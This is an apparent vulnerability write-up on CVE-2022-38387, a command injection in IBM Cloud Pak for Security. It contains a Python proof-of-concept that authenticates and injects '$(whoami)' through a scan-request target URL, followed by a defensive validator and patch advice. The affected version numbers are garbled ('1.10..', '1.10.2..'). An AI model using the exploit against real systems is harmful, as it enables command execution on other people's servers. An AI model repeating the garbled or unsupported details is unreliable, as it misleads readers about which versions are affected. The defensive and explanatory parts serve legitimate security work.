CVE-2022-38387 - Remote Authenticated Arbitrary Command Execution Vulnerability in IBM Cloud Pak for Security (CP4S) 1.10.. to 1.10.2.

A critical security vulnerability, CVE-2022-38387, has been discovered in IBM Cloud Pak for Security (CP4S) versions 1.10.. through 1.10.2.. This vulnerability allows a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. IBM has assigned an X-Force ID of 233786 to this vulnerability.

About IBM Cloud Pak for Security

IBM Cloud Pak for Security (CP4S) is a comprehensive, open security platform that connects and streamlines security workflows across hybrid, multicloud architectures. It helps organizations detect threats, orchestrate response, and manage compliance across their environments.

Vulnerability Details

The remote authenticated arbitrary command execution vulnerability exists in IBM Cloud Pak for Security (CP4S) versions 1.10.. through 1.10.2.. It can be exploited by a remote attacker who is already authenticated to the system. By sending a specially crafted request to the affected application, the attacker could execute arbitrary commands on the system, with consequences such as unauthorized data access, system disruption, or full system compromise.

The following is a proof-of-concept Python code snippet that demonstrates the vulnerability:

import requests

# Replace with the IP address of your IBM CP4S server
cp4s_url = "https://<CP4S_IP_address>"
login_url = cp4s_url + "/api/sessions"
command_injection_url = cp4s_url + "/api/vulnerability"

# Replace with your IBM CP4S username and password
data = {"email": "<CP4S_user_email>", "password": "<CP4S_user_password>"}
headers = {"Content-Type": "application/json"}

# Authenticate with IBM CP4S and obtain a token
response = requests.post(login_url, json=data, headers=headers, verify=False)
token = response.json()['token']
headers["Authorization"] = "Bearer " + token

# Arbitrary command to be executed on the vulnerable server
command = "whoami"
payload = {
    "name": "test",
    "requests": [
        {
            "method": "get",
            "target": "https://localhost/$(%s)" % command,
        }
    ],
}

# Send the payload to the vulnerable endpoint
response = requests.post(command_injection_url, json=payload, headers=headers, verify=False)

# Print server's response
print(response.content)

Please note that this proof-of-concept code is for educational purposes only and should not be used for malicious intent.

References

1. IBM Security Advisory for IBM Cloud Pak for Security
2. IBM X-Force ID: 233786
3. NVD - CVE-2022-38387

Exploit Mitigation

IBM has released a security patch to address this vulnerability, and it is highly recommended to update IBM Cloud Pak for Security to the latest version as soon as possible. Users can find instructions on how to update their systems by following the IBM Security Advisory for IBM Cloud Pak for Security.
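As an added illustration of the defensive side (example code written for this write-up, not IBM's), the following Python validator rejects scan-request bodies whose requests[].target value would carry shell command substitution, using the payload shape shown in the PoC above. It assumes the JSON field names from that PoC; the actual fix is IBM's patch, and server code should never interpolate a user-supplied URL into a shell command in the first place.

```python
import json
import re
from urllib.parse import unquote, urlsplit

# Sequences that let a URL value escape into a shell when it is interpolated
# into a command line, e.g. the "$(...)" substitution used in the PoC above.
SHELL_META = re.compile(r"\$\(|\$\{|`|[;|&\n\r<>]")
ALLOWED_SCHEMES = {"http", "https"}


def validate_target(target):
    """Return (ok, reason) for one requests[].target value (field name assumed from the PoC)."""
    if not isinstance(target, str) or not target:
        return False, "target missing or not a string"
    # Check the raw value and its percent-decoded form, in case the server decodes before use.
    if SHELL_META.search(target) or SHELL_META.search(unquote(target)):
        return False, "shell metacharacters in target"
    try:
        parts = urlsplit(target)
    except ValueError:
        return False, "malformed URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if not parts.hostname:
        return False, "no host in target"
    return True, "ok"


def check_payload(body):
    """Validate every requests[].target in a JSON request body; return a list of rejection reasons."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return ["body is not valid JSON"]
    reqs = doc.get("requests") if isinstance(doc, dict) else None
    if not isinstance(reqs, list):
        return ["missing 'requests' list"]
    problems = []
    for i, req in enumerate(reqs):
        ok, reason = validate_target(req.get("target") if isinstance(req, dict) else None)
        if not ok:
            problems.append("requests[%d]: %s" % (i, reason))
    return problems


# Constructed sample bodies: a benign scan request and the PoC's injected one.
BENIGN = '{"name": "test", "requests": [{"method": "get", "target": "https://localhost/"}]}'
INJECTED = '{"name": "test", "requests": [{"method": "get", "target": "https://localhost/$(whoami)"}]}'

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("injected", INJECTED)):
        print(label, "->", check_payload(body) or "accepted")
```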

Conclusion

CVE-2022-38387 is a critical security vulnerability in IBM Cloud Pak for Security (CP4S) versions 1.10.. through 1.10.2.. It allows remote authenticated attackers to execute arbitrary commands on the system, potentially resulting in devastating consequences. Users are advised to update their IBM Cloud Pak for Security installations immediately to mitigate this vulnerability.

Timeline

Published on: 11/11/2022 19:15:00 UTC
Last modified on: 11/15/2022 20:51:00 UTC